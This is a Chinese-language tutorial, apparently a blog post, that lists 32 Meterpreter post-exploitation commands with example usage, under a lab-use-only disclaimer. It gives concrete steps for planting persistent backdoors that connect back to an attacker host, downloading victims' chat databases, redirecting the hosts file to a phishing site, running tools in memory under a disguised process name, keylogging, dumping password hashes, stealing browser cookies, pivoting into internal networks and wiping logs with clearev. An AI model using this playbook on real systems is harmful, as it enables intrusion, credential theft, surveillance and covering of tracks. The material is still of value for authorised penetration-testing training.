meterpreter會話滲透利用經常使用的32個命令概括小結

僅做滲透測試技術實驗之用，請勿針對任何未受權網絡和設備。

一、background命令

返回，把meterpreter後臺掛起

二、session命令

session 命令能夠查看已經成功獲取的會話

可使用session -i 鏈接到指定序號的meterpreter會話已繼續利用

三、shell命令

獲取目標主機的遠程命令行shell

若是出錯，考慮是目標主機限制了cmd.exe的訪問權，可使用migrate注入到管理員用戶進程中再嘗試

四、cat命令

查看目標主機上的文檔內容

例如：cat  C:\\boot.ini 查看目標主機啓動引導信息

五、getwd命令

獲取系統工做的當前目錄

六、upload命令

上傳文件到目標主機，例如把後門程序setup.exe傳到目標主機system32目錄下

upload  setup.exe  C:\\windows\\system32\

七、download命令

把目標主機上的文件下載到咱們的攻擊主機上

例如：把目標主機C盤根目錄下的boot.ini文件下載到攻擊主機的/root/目錄下

download C:\\boot.ini /root/

download C:\\"Program Files"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/

把目標主機上的QQ聊天記錄下載到攻擊主機的root目錄下（僅實驗用途，是否要考慮變動你QQ程序的安裝路徑了呢）

八、edit命令

調用vi編輯器，對目標主機上的文件修改

例如修改目標主機上的hosts文件，使得目標主機訪問baidu時去到準備好的釣魚網站（僅限實驗用途）

在目標主機上ping www.baidu.com，出來的目標IP就是咱們修改的192.168.1.1了

九、search命令

在目標主機文件系統上查找搜索文件

例如：search  -d  c:\\  -f  *.doc

在目標主機C盤下搜索doc文檔

十、ipconfig命令

這個很少說，查看目標主機上的網絡參數

十一、portfwd命令

端口轉發

例如目標主機上開啓了3389，可是隻容許特定IP訪問，攻擊主機沒法鏈接，可使用portfwd命令把目標主機的3389端口轉發到其餘端口打開

例如：portfwd  add -l  1122 -p 3389 -r  192.168.250.176

把目標主機192.168.250.176的3389端口轉發到1122端口
這是隻須要鏈接目標的1122端口就能夠打開遠程桌面了

rdesktop  -u  administrator  -p  123456  192.168.250.176:1122

十二、route命令

這個也很少說，顯示目標主機上的主機路由表

1三、getuid

查看meterpreter注入到目標主機的進程所屬用戶

1四、sysinfo

查看目標主機系統信息

1五、ps命令

查看目標主機上運行的進程信息，結合migrate使用

1六、migrate

將meterpreter會話移植到另外一個進程

例如反彈的meterpreter會話是對方打開了一個你預置特殊代碼的word文檔而產生的，那麼對方一旦關閉掉該word文檔，咱們獲取到的meterpreter會話就會隨之關閉，因此把會話進程注入到explorer.exe是一個好方法

能夠先用ps命令看一下目標主機的explorer.exe進程的pid

是1668

而後咱們用migrate 1668 把meterpreter會話注入進去

1七、execute命令

在目標主機上運行某個程序

例如咱們目前注入進程到explorer.exe後，運行用戶爲超級管理員administrator

咱們運行一下目標主機上的記事本程序

execute  -f  notepad.exe

目標主機上立馬彈出來一個記事本程序，以下圖：

這樣太明顯，若是但願隱藏後臺執行，加參數-H

execute  -H -f  notepad.exe

此時目標主機桌面沒反應，但咱們在meterpreter會話上使用ps命令看到了

再看一個，咱們運行目標主機上的cmd.exe程序，並以隱藏的方式直接交互到咱們的meterpreter會話上

命令：

execute  -H -i -f  cmd.exe

這達到的效果就跟使用shell命令同樣了

再來一個，在目標主機內存中直接執行咱們攻擊主機上的攻擊程序，好比wce.exe，又好比木馬等，這樣能夠避免攻擊程序存儲到目標主機硬盤上被發現或被查殺。

execute  -H -m -d notepad.exe -f  wce.exe -a "-o  wce.txt"

-d 在目標主機執行時顯示的進程名稱（用以假裝）

-m 直接從內存中執行

 "-o  wce.txt"是wce.exe的運行參數

 1八、getpid

獲取meterpreter會話在目標主機上注入進程的進程號

1九、shutdown命令

關閉目標主機

20、後滲透模塊post/windows/gather/forensics/enum_drives調用

在獲取meterpreter會話session後，調用post/windows/gather/forensics/enum_drives，可獲取目標主機存儲器信息：

命令，在msfconsole下：

use post/windows/gather/forensics/enum_drives

set SESSION 1

exploit

效果如圖：

或直接在meterpreter會話中以命令run  post/windows/gather/forensics/enum_drives調用
2一、調用post/windows/gather/checkvm後滲透模塊，肯定目標主機是不是一臺虛擬機

命令：

run  post/windows/gather/checkvm

效果以下圖：

2二、persistence後滲透模塊向目標主機植入後門程序

命令：

run  persistence -X  -i  5  -p 4444  -r 172.17.11.18 

-X 在目標主機上開機自啓動

-i  不斷嘗試反向鏈接的時間間隔

效果以下圖：

執行過程：

建立攻擊載荷->攻擊載荷植入到目標主機c:\windows\temp目錄下，是一個.vbs的腳本->寫目標主機註冊表鍵值實現開機自動運行。
下圖，在攻擊主機上監聽4444端口，等待反彈會話成功

下圖，看目標主機註冊表Run鍵值果真被寫入了一個pDTizIlNK的鍵值，執行後門vbs腳本

2三、調用metsvc後滲透攻擊模塊

命令：run  metsvc

效果以下圖：

執行過程：在目標主機上建立一個監聽31337端口的服務->在目標主機c:\windows\temp\下建立一個存放後門服務有關文件程序的目錄，並上傳metsrv.x86.dll、metsvc-server.exe、metsvc.exe三個文件到該目錄下->開啓服務

成功後：在目標主機上看到31337號端口已開，且服務多了一個meterpreter(以下圖)

2四、調用getgui後滲透攻擊模塊

做用：開啓目標主機遠程桌面，並可添加管理員組帳號

命令：

run  getgui  -e

開啓目標主機遠程桌面

以下圖：

開啓目標主機的遠程桌面服務後，能夠添加帳號以便利用

命令：

run  getgui  -u  example_username  -p  example_password

以下圖：

執行成功，可使用kali的rdesktop命令使用遠程桌面鏈接目標主機

rdesktop  -u  kali  -p  meterpreter  192.168.250.176:3389
2五、提權命令getsystem

使用getsystem提高當前進城執行帳戶微system用戶，拿到系統最高權限

命令：getsystem

2六、鍵盤記錄器功能keyscan

命令：

keyscan_start   開啓記錄目標主機的鍵盤輸入

keyscan_dump   輸出截獲到的目標鍵盤輸入字符信息

keyscan_stop     中止鍵盤記錄

效果以下圖：

箭頭所指爲截獲到目標主機的鍵盤輸入字符

2七、系統帳號密碼獲取

命令：hashdump

在得到system權限的狀況下，使用hashdump命令能夠處處目標主機的SAM文件，獲取目標主機的帳號密碼hash信息，剩下的能夠用爆破軟件算出明文密碼

效果如圖：

2八、調用post/windows/gather/enum_applications模塊獲取目標主機上的軟件安裝信息

命令：run  post/windows/gather/enum_applications

效果如圖：

2九、調用post/windows/gather/dumplinks獲取目標主機上最近訪問過的文檔、連接信息

命令：run  post/windows/gather/dumplinks

效果以下圖：

30、調用post/windows/gather/enum_ie後滲透模塊，讀取目標主機IE瀏覽器cookies等緩存信息，嗅探目標主機登陸過的各種帳號密碼

命令：run  post/windows/gather/enum_ie

效果以下圖：

獲取到的目標主機上的ie瀏覽器緩存歷史記錄和cookies信息等都保存到了攻擊主機本地的/root/.msf5/loot/目錄下。

3一、route命令

使用route命令能夠藉助meterpreter會話進一步msf滲透內網，咱們已經拿下併產生meterpreter反彈會話的主機可能出於內網之中，外有一層NAT，咱們沒法直接向其內網中其餘主機發起攻擊，則能夠藉助已產生的meterpreter會話做爲路由跳板，攻擊內網其它主機。

能夠先使用run  get_local_subnets命令查看已拿下的目標主機的內網IP段狀況

命令：run  get_local_subnets

以下圖：

其內網尚有192.168.249.0/24網段，咱們沒法直接訪問

下面作一條路由，下一跳爲當前拿下主機的session id（目前爲5），即全部對249網段的攻擊流量都經過已滲透的這臺目標主機的meterpreter會話來傳遞。

命令：route add  192.168.249.0 255.255.255.0 5

再使用route print查看一下路由表，效果以下圖：

最後咱們就能夠經過這條路由，以當前拿下的主機meterpreter做爲路由跳板攻擊249網段中另外一臺有ms08-067漏洞的主機，得到反彈會話成功順利拿下了另外一臺內網主機192.168.249.1，以下圖：

3二、clearev命令

入侵痕跡擦除

在滲透利用過程當中不免留下日誌等信息痕跡，使用clearev命令擦除痕跡後再跑。

命令：clearev

效果以下圖：